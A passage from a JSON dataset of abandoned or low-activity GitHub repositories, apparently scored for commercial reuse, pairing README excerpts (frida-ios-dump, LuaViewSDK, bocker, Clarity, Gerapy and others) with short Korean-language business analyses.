검사하는 웹 서비스\n2. **앱 개","readme_excerpt":"# frida-ios-dump\nPull a decrypted IPA from a jailbroken device\n\n\n## Usage\n\n 1. Install [frida](http://www.frida.re/) on device\n 2. `sudo pip install -r requirements.txt --upgrade`\n 3. Run usbmuxd/iproxy SSH forwarding over USB (Default 2222 -> 22). e.g. `iproxy 2222 22`\n 4. Run ./dump.py `Display name` or `Bundle identifier`\n\nFor SSH/SCP make sure you have your public key added to the target device's ~/.ssh/authorized_keys file.\n\n```\n./dump.py Aftenposten\nStart the target app Aftenposten\nDumping Aftenposten to /var/folders/wn/9v1hs8ds6nv_xj7g95zxyl140000gn/T\nstart dump /var/containers/Bundle/Application/66423A80-0AFE-471C-BC9B-B571107D3C27/AftenpostenApp.app/AftenpostenApp\nstart dump /private/var/containers/Bundle/Application/66423A80-0AFE-471C-BC9B-B571107D3C27/AftenpostenApp.app/Frameworks/AFNetworking.framework/AFNetworking\nstart dump /private/var/containers/Bundle/Application/66423A80-0AFE-471C-BC9B-B571107D3C27/AftenpostenApp.app/Frameworks/ATInternet_iOS_ObjC_SDK.framework/ATInte","composite_score":0.5306,"license_safety_tag":"safe"},{"name":"alibaba/LuaViewSDK","github_url":"https://github.com/alibaba/LuaViewSDK","stars":8,"language":"Objective-C","license":"MIT","abandonment_months":49,"description":"# LuaViewSDK 상업화 분석\n\n## 왜 보물인가\n앱 개발자들이 복잡한 코딩 없이 빠르게 사용자 인터페이스를 만들 수 있도록 도와주는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 앱 개발 회사들을 위한 클라우드 기반 개발 플랫폼으로 월 구독료 수취\n2. **내부 업무 도구**: 대형 앱 개발사의 내부 개발팀이 개발 속도를","readme_excerpt":"# Welcome to LuaViewSDK\n\nLuaViewSDK is a cross-platform framework which is designed to build native, dynamic and swift user interfaces. It's based on Lua VM and chooses lua as it's script language.\n\n## Why Lua\n\n* Lua is a efficient and swift language. A single Lua VM costs 200k to 300k memorys only in iOS\n* Lua is widly used and it's easy to bind to third party frameworks\n* LuaView API is nature to native mobile developers, you guys don't have to understand what React.js or Vue.js or DOM is.\n\n## Demos\n\n* Complex LuaViewSDK-rendered native pages\n\n  <img src='https://gw.alicdn.com/tfs/TB1RzmbQpXXXXXAapXXXXXXXXXX-1198-931.png'/>\n\n* Simple games\n\n  ![](https://gw.alicdn.com/tfs/TB1rKx2QpXXXXbVapXXXXXXXXXX-340-603.gif)\n\n## Try Playground App\n\n- iOS download\n\n  [View in App Store](https://itunes.apple.com/cn/app/luaviewplayground/id1216114838?mt=8)\n\n  ![](https://gw.alicdn.com/tfs/TB1aFkkQpXXXXcBXFXXXXXXXXXX-280-280.png)\n\n- Android download\n\n  ![img](https://alibaba.github.io/LuaViewSDK/guid","composite_score":0.5305,"license_safety_tag":"safe"},{"name":"p8952/bocker","github_url":"https://github.com/p8952/bocker","stars":6,"language":"Shell","license":"gpl-3.0","abandonment_months":103,"description":"# p8952/bocker 상용화 분석\n\n## 왜 보물인가\n복잡한 설정 없이 가볍게 컨테이너 환경을 구축할 수 있는 도구로, 개발 초보자도 손쉽게 프로젝트를 배포할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 웹 인터페이스에서 클릭만으로 자신의 애플리케이션을 배포할 수 있는 \"간편 배포 플랫폼\"\n2. **내부 업무 도구*","readme_excerpt":"# Bocker\nDocker implemented in around 100 lines of bash.\n\n  * [Prerequisites](#prerequisites)\n  * [Example Usage](#example-usage)\n  * [Functionality: Currently Implemented](#functionality-currently-implemented)\n  * [Functionality: Not Yet Implemented](#functionality-not-yet-implemented)\n  * [License](#license)\n\n## Prerequisites\n\nThe following packages are needed to run bocker.\n\n* btrfs-progs\n* curl\n* iproute2\n* iptables\n* libcgroup-tools\n* util-linux >= 2.25.2\n* coreutils >= 7.5\n\nBecause most distributions do not ship a new enough version of util-linux you will probably need to grab the sources from [here](https://www.kernel.org/pub/linux/utils/util-linux/v2.25/) and compile it yourself.\n\nAdditionally your system will need to be configured with the following:\n\n* A btrfs filesystem mounted under `/var/bocker`\n* A network bridge called `bridge0` and an IP of 10.0.0.1/24\n* IP forwarding enabled in `/proc/sys/net/ipv4/ip_forward`\n* A firewall routing traffic from `bridge0` to a physical in","composite_score":0.5304,"license_safety_tag":"restricted"},{"name":"CGamesPlay/dfm","github_url":"https://github.com/CGamesPlay/dfm","stars":8,"language":"Go","license":"0BSD","abandonment_months":34,"description":"","readme_excerpt":"# dfm - Dotfiles Manager\n\ndfm is a generic file syncing utility to keep two directories in sync, using symbolic links. It's targeted at keeping a home directory in sync with a dotfiles repository, but can be used in other circumstances as well.\n\n**Features:**\n\n- No dependency on git. dfm works fine with git, Dropbox, or any other file syncing tool.\n- No configuration files. Add files to be tracked just by placing them in the directory.\n- No runtime dependencies. dfm can be run directly from the single binary file on a brand new machine.\n- Overlay multiple repositories on top of each other.\n- Automatically clean up removed files.\n\n[![asciicast](https://asciinema.org/a/284642.svg)](https://asciinema.org/a/284642)\n\n## Project status\n\nThis project is \"done\". It's maintained, but there are no planned new features. It's actively used to handle [the author's dotfiles](https://github.com/CGamesPlay/dotfiles) and possibly others with few issues reported. If you identify a bug or dfm is not comp","composite_score":0.5302,"license_safety_tag":"safe"},{"name":"react-static/react-static","github_url":"https://github.com/react-static/react-static","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":43,"description":"# react-static 분석 보고서\n\n## 왜 보물인가\n웹사이트를 빠르고 효율적으로 만들어주는 오픈소스 도구로, 특히 정적 콘텐츠 기반의 사이트 제작에 최적화되어 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **블로그/매거진 플랫폼 SaaS**: 개인 블로거나 미디어 회사를 위해 빠르게 로딩되는 블로그 사이트를 자동 생성하는 서비스\n2. **포트폴리오 ","readme_excerpt":"## This is now in maintenance only mode. No new major versions will be released.\n_Remix and NextJS are good alternatives._\n\n[Where is react-static 8? The state of react-static -- and its inevitable death. #1661](https://github.com/react-static/react-static/discussions/1661)\n\n----------------\n\n![React Static Logo](https://github.com/react-static/react-static/raw/master/media/react-static-logo-2x.png)\n\n[![Travis CI Build Status](https://travis-ci.org/react-static/react-static.svg?branch=master)](https://travis-ci.org/react-static/react-static) [![npm package v](https://img.shields.io/npm/v/react-static.svg)](https://www.npmjs.org/package/react-static) [![npm package dm](https://img.shields.io/npm/dm/react-static.svg)](https://npmjs.com/package/react-static)\n[![Github Stars](https://img.shields.io/github/stars/react-static/react-static.svg?style=social&label=Star)](https://github.com/react-static/react-static) [![Twitter Follow](https://img.shields.io/twitter/follow/reactstaticjs.svg?styl","composite_score":0.5299,"license_safety_tag":"safe"},{"name":"ibm-developer-skills-network/wtecc-CICD_PracticeCode","github_url":"https://github.com/ibm-developer-skills-network/wtecc-CICD_PracticeCode","stars":63,"language":"Python","license":"Apache-2.0","abandonment_months":11,"description":"","readme_excerpt":"","composite_score":0.5299,"license_safety_tag":"safe"},{"name":"checkly/puppeteer-recorder","github_url":"https://github.com/checkly/puppeteer-recorder","stars":24,"language":"JavaScript","license":"MIT","abandonment_months":42,"description":"","readme_excerpt":"# 🚨 Deprecated!\nAs of Dec 16th 2022, Headless Recorder is fully deprecated. No new changes, support, maintenance or new features are expected to land.\n\nFor more information and possible alternatives refer to this [issue](https://github.com/checkly/headless-recorder/issues/232).\n\n</p>\n\n<p align=\"center\">\n  <img width=\"200px\" src=\"./assets/logo.png\" alt=\"Headless Recorder\" />\n</p>\n\n<p>\n  <img height=\"128\" src=\"https://www.checklyhq.com/images/footer-logo.svg\" align=\"right\" />\n  <h1>Headless Recorder</h1>\n</p>\n\n<p>\n  <img src=\"https://github.com/checkly/headless-recorder/workflows/Lint%20&%20Build%20&%20Test/badge.svg?branch=main\" alt=\"Github Build\"/>\n  <img src=\"https://img.shields.io/chrome-web-store/users/djeegiggegleadkkbgopoonhjimgehda?label=Chrome%20Webstore%20-%20Users\" alt=\"Chrome Webstore Users\" />\n  <img src=\"https://img.shields.io/chrome-web-store/v/djeegiggegleadkkbgopoonhjimgehda?label=Chrome%20Webstore\" alt=\"Chrome Webstore Version\" />\n</p>\n\n\n> 🎥 Headless recorder is a Chrom","composite_score":0.5298,"license_safety_tag":"safe"},{"name":"TeaWeb/build","github_url":"https://github.com/TeaWeb/build","stars":23,"language":"Go","license":"MIT","abandonment_months":40,"description":"# TeaWeb/build 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션을 빠르게 만들 수 있는 개발 도구로, 기업들이 소프트웨어 개발 비용과 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 회사들이 자체 웹 기반 업무 관리 시스템을 빠르게 구축하는 데 사용\n- **내부 업무 도구**: 대기업의 HR팀, 재무팀","readme_excerpt":"# TeaWeb - 可视化的Web代理服务\nTeaWeb是一款集静态资源、缓存、代理、统计、日志、安全、监控于一体的可视化智能WebServer。目标是 **做一个能让程序员和运维工程师喝着茶、唱着歌，就能把事情完成的一个智能化的简单易用的产品**。\n\nTeaWeb使用Go语言实现，在高可定制化前提下，保证高性能、高并发。\n\n加入QQ群199435611、微信liuxiangchao（\"刘祥超\"的全拼）跟大家一起讨论，也可以发送邮件到 `root@teaos.cn`。\n\n# 架构 \n~~~\n             |--------------|        |----------------------------| \nClient  <->  | TeaWeb:7777  |   <->  | Nginx, Apache, Tomcat,     |\n             |--------------|        | Fastcgi, Static Files, ... |\n                   |                 |----------------------------|\n                   |\n                   |\n             |-------------|\n             |  Web        |     \n             |  Proxy      |  \n             |  Log        |  \n             |  Monitor    |      \n             |  Statistics |     \n             |  WAF        |\n             |  Cache      |\n             |  ...        |\n             |-------------|\n~~~\n\n# 预览\n![预览](./docs/screenshots/screen-shot-1.png)\n\n![预览](./docs/screenshots/screen-shot-2.png)\n\n![预览](./docs/screenshots/s","composite_score":0.5295,"license_safety_tag":"safe"},{"name":"jeelabs/esp-link","github_url":"https://github.com/jeelabs/esp-link","stars":8,"language":"C","license":"NOASSERTION","abandonment_months":59,"description":"# esp-link 기술 평가 분석\n\n## 왜 보물인가\nIoT 기기들이 인터넷에 연결되도록 도와주는 저렴한 중간 다리 역할을 해주는 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 관리 서비스**: 집의 조명, 온도조절기 등 오래된 기기들을 새로운 스마트 시스템에 연결해주는 SaaS\n2. **산업용 기계 모니터링**: 공장의 낡은 기계들의 상","readme_excerpt":"ESP-LINK: Wifi-Serial Bridge w/REST&MQTT\n========================================\n\n<img src=\"https://cloud.githubusercontent.com/assets/39480/19333951/73fcdcbe-90ad-11e6-8572-5e654377275a.png\">\n\nThe esp-link firmware connects a micro-controller to the internet using an ESP8266 Wifi module.\nIt implements a number of features:\n\n- transparent bridge between Wifi and serial, useful for debugging or inputting into a uC\n- flash-programming attached Arduino/AVR microcontrollers and\n  LPC800-series and other ARM microcontrollers via Wifi\n- built-in stk500v1 programmer for AVR uC's: program using HTTP upload of hex file\n- outbound REST HTTP requests from the attached micro-controller to the internet\n- MQTT client pub/sub from the attached micro-controller to the internet\n- serve custom web pages containing data that is dynamically pulled from the attached uC and\n  that contain buttons and fields that are transmitted to the attached uC (feature not\n  fully ready yet)\n\nThe firmware includes a tin","composite_score":0.5293,"license_safety_tag":"unknown"},{"name":"vmware/clarity","github_url":"https://github.com/vmware/clarity","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":39,"description":"# VMware Clarity 분석 보고서\n\n## 왜 보물인가\nVMware가 만든 전문적인 UI 디자인 시스템으로, 회사 웹사이트와 앱을 빠르고 일관되게 만들 수 있는 완성된 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 관리 플랫폼, 데이터 분석 대시보드 등 엔터프라이즈 소프트웨어의 사용자 인터페이스 제공\n2. **내","readme_excerpt":"NOTE: The Clarity Design System has moved and is now split into two repositories, one for [Clarity Angular](https://github.com/vmware-clarity/ng-clarity) and one for [Clarity Core](https://github.com/vmware-clarity/core). This repository is now for archived purposes only.\n\n![Clarity](logo.png)\n\n# Clarity Design System\n\n![Build](https://github.com/vmware/clarity/workflows/Build/badge.svg)\n\nClarity is an open source design system that brings together UX\nguidelines, design resources, and coding implementations with Web Components. This\nrepository includes everything you need to build, customize, test, and deploy\nClarity. For complete documentation, visit the [Clarity website](https://clarity.design).\n\nIf you are looking for Clarity Angular, our previous implementation of Clarity built\nin Angular, please see the [`angular` branch](https://github.com/vmware/clarity/tree/angular/) for the latest version there.\n\n## Getting Started\n\nClarity is published as five npm packages:\n\n- [![npm version ","composite_score":0.5293,"license_safety_tag":"safe"},{"name":"benedekrozemberczki/awesome-graph-embedding","github_url":"https://github.com/benedekrozemberczki/awesome-graph-embedding","stars":6,"language":"Python","license":"CC0-1.0","abandonment_months":39,"description":"# 그래프 임베딩 awesome 컬렉션 분석\n\n## 왜 보물인가\n복잡한 네트워크 관계를 컴퓨터가 이해하기 쉬운 형태로 변환하는 기술들을 한곳에 모아놓은 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소셜 네트워크 추천 시스템 구축 (친구 추천, 콘텐츠 추천)\n2. **내부 업무 도구**: 금융사 고객 부정거래 탐지 시스템\n","readme_excerpt":"# Awesome Graph Classification\n[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com)\n![License](https://img.shields.io/github/license/benedekrozemberczki/awesome-graph-embedding.svg?color=blue)\n[![repo size](https://img.shields.io/github/repo-size/benedekrozemberczki/awesome-graph-classification.svg)](https://github.com/benedekrozemberczki/awesome-graph-classification/archive/master.zip) [![benedekrozemberczki](https://img.shields.io/twitter/follow/benrozemberczki?style=social&logo=twitter)](https://twitter.com/intent/follow?screen_name=benrozemberczki) \n\nA collection of graph classification methods, covering embedding, deep learning, graph kernel and factorization papers with reference implementations.\n\nRelevant graph classification benchmark datasets are available","composite_score":0.5292,"license_safety_tag":"unknown"},{"name":"chaharnishant11/PlacmentPrepGuide","github_url":"https://github.com/chaharnishant11/PlacmentPrepGuide","stars":7,"language":"","license":"unknown","abandonment_months":63,"description":"# PlacmentPrepGuide 상업화 분석\n\n## 왜 보물인가\n취업을 준비하는 학생들이 면접과 필기시험을 체계적으로 준비할 수 있도록 정리된 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **취업 준비 온라인 강좌 플랫폼**: 대학생과 직장인을 대상으로 월 구독형 학습 콘텐츠 서비스로 운영\n2. **기업 인사팀 교육 도구**: 신입사원 채용 ","readme_excerpt":"# PlacmentPrepGuide\nIncludes all the resources for Core CS fundamentals\n\nLink to best resources to learn c++, java, python, javascript and Data Structures and Algorithms : https://docs.google.com/document/d/1TK2_ij3oBDy_cqRuXVf3EEWBrLCmoQ7vRiW_zwKrX4A/edit?usp=sharing\n\nLink to my Youtube Channel: https://www.youtube.com/channel/UCVe8CMJF4caRzuckVYV8CaQ\n","composite_score":0.5287,"license_safety_tag":"unknown"},{"name":"0voice/learning_mind_map","github_url":"https://github.com/0voice/learning_mind_map","stars":309,"language":"","license":"unknown","abandonment_months":25,"description":"# 0voice/learning_mind_map 분석\n\n## 왜 보물인가\n복잡한 개념을 시각적으로 정리하는 '마인드맵' 학습 자료 모음으로, 프로그래밍부터 일반 상식까지 다양한 분야의 지식을 체계적으로 구조화해놓은 교육 콘텐츠 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 학원이나 인강 서비스에서 마인드맵을 수강생에게 제공하","readme_excerpt":"# 🍱 “干饭人” --- 2024年【思维导图】盒子，C/C++，Golang，Linux，云原生，数据库，DPDK，音视频开发，TCP/IP，数据结构，计算机原理等等\n\n<div align=center>\n  \n<br>  \n  \n<img width=\"70%\" height=\"70%\" src=\"https://user-images.githubusercontent.com/87457873/142826075-55b8e588-959b-4c69-867f-54e9deeed026.jpg\"/>\n  \n## —— 优秀的果实，从导图开始\n  \n<br>  \n  \n</div>\n\n本repo为涉及C/C++语言的技术点，整理收纳网络中大家归纳总结的【思维导图】，帮助大家更好地学习以及掌握知识重点。\n\n**所有导图来源于互联网。所谓取之于互联网，用之于互联网。**\n\n如果涉及版权侵犯，请邮件至 wchao_isvip@163.com ，我们将第一时间处理。\n\n如果您对我们的项目表示赞同与支持，欢迎您 [lssues](https://github.com/0voice/learning_mind_map/issues) 我们，或者邮件 wchao_isvip@163.com 我们，更加欢迎您 [pull requests](https://github.com/0voice/learning_mind_map/pulls) 加入我们。\n\n感谢您的支持！\n\n<p align=\"center\">\n  <a href=\"https://github.com/0voice/learning_mind_map/archive/refs/heads/main.zip\"><img src=\"https://img.shields.io/badge/PDF下载-blueviolet\" alt=\"\"></a>\n  <a href=\"https://github.com/0voice/learning_mind_map/blob/main/README.md#%E8%81%94%E7%B3%BB%E4%B8%93%E6%A0%8F\"><img src=\"https://img.shields.io/badge/微信公众号-green\" alt=\"\"></a>\n</p>\n\n<","composite_score":0.5286,"license_safety_tag":"unknown"},{"name":"lujakob/nestjs-realworld-example-app","github_url":"https://github.com/lujakob/nestjs-realworld-example-app","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":27,"description":"# lujakob/nestjs-realworld-example-app 분석\n\n## 왜 보물인가\n복잡한 웹 애플리케이션을 만드는 과정을 실제 예제로 배울 수 있는 교과서 같은 저장소입니다.\n\n## 어디에 쓸 수 있나\n1. **블로그/SNS 플랫폼 SaaS**: 사용자 계정, 게시물, 댓글 기능이 모두 포함되어 기본 소셜 서비스 구축 가능\n2. **기업 콘텐츠","readme_excerpt":"# ![Node/Express/Mongoose Example App](project-logo.png)\n\n[![Build Status](https://travis-ci.org/anishkny/node-express-realworld-example-app.svg?branch=master)](https://travis-ci.org/anishkny/node-express-realworld-example-app)\n\n> ### NestJS codebase containing real world examples (CRUD, auth, advanced patterns, etc) that adheres to the [RealWorld](https://github.com/gothinkster/realworld-example-apps) API spec.\n\n\n----------\n\n# Getting started\n\n## Installation\n\nClone the repository\n\n    git clone https://github.com/lujakob/nestjs-realworld-example-app.git\n\nSwitch to the repo folder\n\n    cd nestjs-realworld-example-app\n    \nInstall dependencies\n    \n    npm install\n\nCopy config file and set JsonWebToken secret key\n\n    cp src/config.ts.example src/config.ts\n    \n----------\n\n## Database\n\nThe codebase contains examples of two different database abstractions, namely [TypeORM](http://typeorm.io/) and [Prisma](https://www.prisma.io/). \n    \nThe branch `master` implements TypeORM with a mySQL","composite_score":0.5284,"license_safety_tag":"unknown"},{"name":"zackchase/mxnet-the-straight-dope","github_url":"https://github.com/zackchase/mxnet-the-straight-dope","stars":6,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":74,"description":"# MXNet 교육 자료 저장소 분석\n\n## 왜 보물인가\n인공지능을 배우고 싶지만 어디서부터 시작해야 할지 몰랐던 사람들을 위해 실제로 동작하는 코드로 차근차근 가르쳐주는 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 교육 플랫폼에서 \"AI 개념 이해하기\" 강좌를 만들어 월 구독 형태로 판매\n2. **내부 업무 도","readme_excerpt":"# Deep Learning - The Straight Dope (*Deprecated* Please see d2l.ai)\n## This content has been moved to Dive into the Deep Learning Book freely available at https://d2l.ai/.\n\n\n\n## Abstract\nThis repo contains an\nincremental sequence of notebooks designed to teach deep learning, MXNet, and\nthe ``gluon`` interface. Our goal is to leverage the strengths of Jupyter\nnotebooks to present prose, graphics, equations, and code together in one place.\nIf we're successful, the result will be a resource that could be simultaneously\na book, course material, a prop for live tutorials, and a resource for\nplagiarising (with our blessing) useful code. To our knowledge there's no source\nout there that teaches either (1) the full breadth of concepts in modern deep\nlearning or (2) interleaves an engaging textbook with runnable code. We'll find\nout by the end of this venture whether or not that void exists for a good\nreason.\n\nAnother unique aspect of this book is its authorship process. We are\ndeveloping this","composite_score":0.5284,"license_safety_tag":"safe"},{"name":"facebook/shimmer-android","github_url":"https://github.com/facebook/shimmer-android","stars":5,"language":"Java","license":"NOASSERTION","abandonment_months":39,"description":"# Facebook Shimmer Android 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 콘텐츠가 로딩될 때 반짝이는 효과를 쉽게 만들어주는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **전자상거래 앱 개발 회사**: 상품 이미지 로딩 중 반짝이는 화면 효과로 사용자 경험 개선\n2. **소셜 미디어 앱**: 친구 목록이나 피드 로딩 시 ","readme_excerpt":"<h1 align=\"center\">\n<img src=\"/shimmer.gif?raw=true\" alt=\"Shimmer\" /><br />\nShimmer for Android\n</h1>\n\n\n[Shimmer](http://facebook.github.io/shimmer-android) is an Android library that\nprovides an easy way to add a shimmer effect to any view in your Android app.\n\nIt is useful as an unobtrusive loading indicator, and was originally developed for <a href=\"http://newsroom.fb.com/news/2013/04/introducing-home/\">Facebook Home</a>.\n\nFind more examples and usage instructions over at:\n\n[facebook.github.io/shimmer-android](http://facebook.github.io/shimmer-android)\n\n## License\n\nBSD License\n\nFor Shimmer-android software\n\nCopyright (c) Meta Platforms, Inc. and affiliates. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice, this\n   list of conditions and the following disclaimer.\n\n * Redistributions in binary form","composite_score":0.5281,"license_safety_tag":"unknown"},{"name":"lk-geimfari/awesomo","github_url":"https://github.com/lk-geimfari/awesomo","stars":5,"language":"Go","license":"CC0-1.0","abandonment_months":27,"description":"# awesomo 저장소 분석\n\n## 왜 보물인가\n다양한 프로그래밍 언어와 기술 분야의 학습 자료와 예제 코드들을 한곳에 모아놓은 교육 자료 모음으로, 개발자들의 학습 곡선을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼**: 프로그래밍 입문자를 위한 체계화된 학습 경로 제공 SaaS\n- **기업 개발팀 온보딩**: 신입 엔지니","readme_excerpt":"[![awesomo](https://github.com/lk-geimfari/awesomo/assets/15812620/48c05000-9898-4603-882d-a143399f18cc)](https://github.com/lk-geimfari/awesomo)\n\nIf you're interested in Open Source and thinking about joining the community of developers, you might find a suitable project here.\n\n# Languages\n\n - [C](languages/C.md)\n - [C#](languages/C%23.md)\n - [C++](languages/C%2B%2B.md)\n - [Clojure](languages/CLOJURE.md)\n - [Common Lisp](languages/COMMON_LISP.md)\n - [Crystal](languages/CRYSTAL.md)\n - [CSS](languages/CSS.md)\n - [D](languages/D.md)\n - [Dart](languages/DART.md)\n - [Elixir](languages/ELIXIR.md)\n - [Elm](languages/ELM.md)\n - [Emacs Lisp](languages/EMACS_LISP.md)\n - [Erlang](languages/ERLANG.md)\n - [Go](languages/GOLANG.md)\n - [Haskell](languages/HASKELL.md)\n - [Haxe](languages/HAXE.md)\n - [Java](languages/JAVA.md)\n - [JavaScript](languages/JAVASCRIPT.md)\n - [Kotlin](languages/KOTLIN.md)\n - [Lua](languages/LUA.md)\n - [OCaml](languages/OCAML.md)\n - [Python](languages/PYTHON.md)\n - [R](langua","composite_score":0.5276,"license_safety_tag":"unknown"},{"name":"NotFound9/interviewGuide","github_url":"https://github.com/NotFound9/interviewGuide","stars":7,"language":"Java","license":"unknown","abandonment_months":34,"description":"# interviewGuide 저장소 분석\n\n## 왜 보물인가\n취업을 준비하는 사람들이 면접 질문과 답변을 체계적으로 학습할 수 있는 가이드 자료를 한곳에서 얻을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **채용 플랫폼 SaaS**: 구직자가 면접 준비를 돕는 구독형 서비스로, 맞춤 면접 질문과 예상 답변을 제공\n2. **기업 교육 도구**: 신입사","readme_excerpt":"\n# 《大厂面试指北》\n\n最佳阅读地址：http://notfound9.github.io/interviewGuide/\n\nGithub项目主页：https://github.com/NotFound9/interviewGuide\n\n作者博客地址：https://juejin.im/user/5b370a42e51d4558ce5eb969\n\n## 为什么要做这个开源项目？\n\n之前在业余时间阅读技术书籍时，发现只阅读而不产出，这样收效甚微。所以就在网上找了很多常见的技术问题，根据自己的技术积累，查阅书籍，阅读文档和博客等资料，尝试着用自己的话去写了很多原创解答，最终整理开源到Github。一方面是便于自己复习巩固，一方面是将这些自己写的解答开源出来分享给大家，希望可以帮助到大家，也欢迎大家一起来完善这个项目，为开源做贡献。\n\n<figure class=\"half\">\n<img src=\"http://notfound9.github.io/interviewGuide/static/image1.jpg\" width=\"30%\"/>\n\n\n## 目录\n\n- [首页](README.md)\n* Java\n  - [基础](docs/JavaBasic.md)\n    - [1.Java中的多态是什么？](docs/JavaBasic.md#Java中的多态是什么？)\n    - [2.Java中变量，代码块，构造器之间执行顺序是怎么样的？](docs/JavaBasic.md#java中变量，代码块，构造器之间执行顺序是怎么样的？)\n    - [3.final关键字有哪些作用？](docs/JavaBasic.md#final关键字有哪些作用？)\n    - [4.Integer类会进行缓存吗？](docs/JavaBasic.md#Integer类会进行缓存吗？)\n    - [5.抽象类有哪些特点？](docs/JavaBasic.md#抽象类有哪些特点？)\n    - [6.String，StringBuffer和StringBuilder之间的区别是什么？](docs/JavaBasic.md#String，StringBuffer和StringBuilder之间的区别是什么？)\n    - [7.编译型编程语言，解释型编程语言，伪编译型语言的区别是什","composite_score":0.5275,"license_safety_tag":"unknown"},{"name":"Th3Wall/Fakeflix","github_url":"https://github.com/Th3Wall/Fakeflix","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":29,"description":"# Fakeflix 상용화 분석\n\n## 왜 보물인가\nNetflix처럼 영상을 스트리밍하는 개인 서비스를 누구나 쉽게 만들 수 있는 기반이 되어 기업이나 개인 창작자가 자신의 콘텐츠를 직접 배포할 수 있기 때문입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 학원이나 기업교육업체가 자신의 강의영상을 회원제로 판매하는 서비스\n2. **내부 ","readme_excerpt":"<a href=\"https://fakeflix.th3wall.codes\">\n  <img alt=\"Fakeflix – Not the usual clone that you can find on the web\" src=\"https://cdn.jsdelivr.net/gh/Th3Wall/assets-cdn/Fakeflix/Fakeflix_readme.png\">\n  <h1 align=\"center\">Fakeflix</h1>\n</a>\n\n<p align=\"center\">\n  Not the usual clone that you can find on the web.\n</p>\n\n<p align=\"center\">\n  <a href=\"https://twitter.com/Th3Wall25\">\n    <img src=\"https://img.shields.io/twitter/follow/Th3Wall25?style=flat&label=Th3Wall25&logo=twitter&color=0bf&logoColor=fff\" alt=\"Twitter\" />\n  </a>\n</p>\n\n<p align=\"center\">\n  <a href=\"#-about\"><strong>About</strong></a> ·\n  <a href=\"#%EF%B8%8F-demo\"><strong>Demo</strong></a> ·\n  <a href=\"#sparkles-features\"><strong>Features</strong></a> ·\n  <a href=\"#rocket-technologies\"><strong>Technologies</strong></a> ·\n  <a href=\"#-screenshots\"><strong>Screenshots</strong></a> ·\n  <a href=\"#-run-locally\"><strong>Run Locally</strong></a> ·\n  <a href=\"#white_check_mark-requirements\"><strong>Requirements</strong></a> ·\n  <a hre","composite_score":0.5273,"license_safety_tag":"safe"},{"name":"HashLips/generative-art-opensource","github_url":"https://github.com/HashLips/generative-art-opensource","stars":34,"language":"JavaScript","license":"MIT","abandonment_months":48,"description":"# HashLips/generative-art-opensource 분석\n\n## 왜 보물인가\nAI가 자동으로 디지털 미술작품을 만들어주는 기술을 누구나 무료로 쓸 수 있는 오픈소스입니다.\n\n## 어디에 쓸 수 있나\n\n**1. NFT 생성 SaaS 서비스**\n- 사용자가 웹사이트에서 클릭만 해도 고유한 디지털 아트를 자동 생성하고 판매할 수 있게 하는 구독 서","readme_excerpt":"# Welcome to HashLips 👄\n\nImportant: There is a new repo for this code.\n[https://github.com/HashLips/hashlips_art_engine](https://github.com/HashLips/hashlips_art_engine)\n\nAll the code in these repos was created and explained by HashLips on the main YouTube channel.\n\nTo find out more please visit:\n\n[📺 YouTube](https://www.youtube.com/channel/UC1LV4_VQGBJHTJjEWUmy8nA)\n\n[👄 Discord](https://discord.com/invite/qh6MWhMJDN)\n\n[💬 Telegram](https://t.me/hashlipsnft)\n\n[🐦 Twitter](https://twitter.com/hashlipsnft)\n\n[ℹ️ Website](https://hashlips.online/HashLips)\n\n# generative-art-opensource\nCreate generative art by using the canvas api and node js, feel free to contribute to this repo with new ideas.\n\n# Project Setup\n- install `node.js` on your local system (https://nodejs.org/en/)\n- clone the repository to your local system `git@github.com:HashLips/generative-art-opensource.git`\n- run `yarn install` to install dependencies\n\n# How to use\n## Run the code\n1. Run `node index.js`\n2. Open the `./output` ","composite_score":0.5273,"license_safety_tag":"safe"},{"name":"Gerapy/Gerapy","github_url":"https://github.com/Gerapy/Gerapy","stars":8,"language":"Python","license":"mit","abandonment_months":19,"description":"","readme_excerpt":"# Gerapy\n\n![Build](https://github.com/Gerapy/Gerapy/workflows/build/badge.svg)\n![Read the Docs](https://img.shields.io/readthedocs/gerapy)\n![PyPI - Python Version](https://img.shields.io/badge/python-3.6%2B-blue)\n[![GitHub stars](https://img.shields.io/github/stars/Gerapy/Gerapy)](https://github.com/Gerapy/Gerapy/stargazers)\n![PyPI - Downloads](https://img.shields.io/pypi/dm/gerapy)\n![Docker Pulls](https://img.shields.io/docker/pulls/germey/gerapy)\n![PyPI - License](https://img.shields.io/pypi/l/gerapy)\n\nDistributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.\n\n## Documentation\n\nDocumentation is available online at [https://docs.gerapy.com/](https://docs.gerapy.com/) and 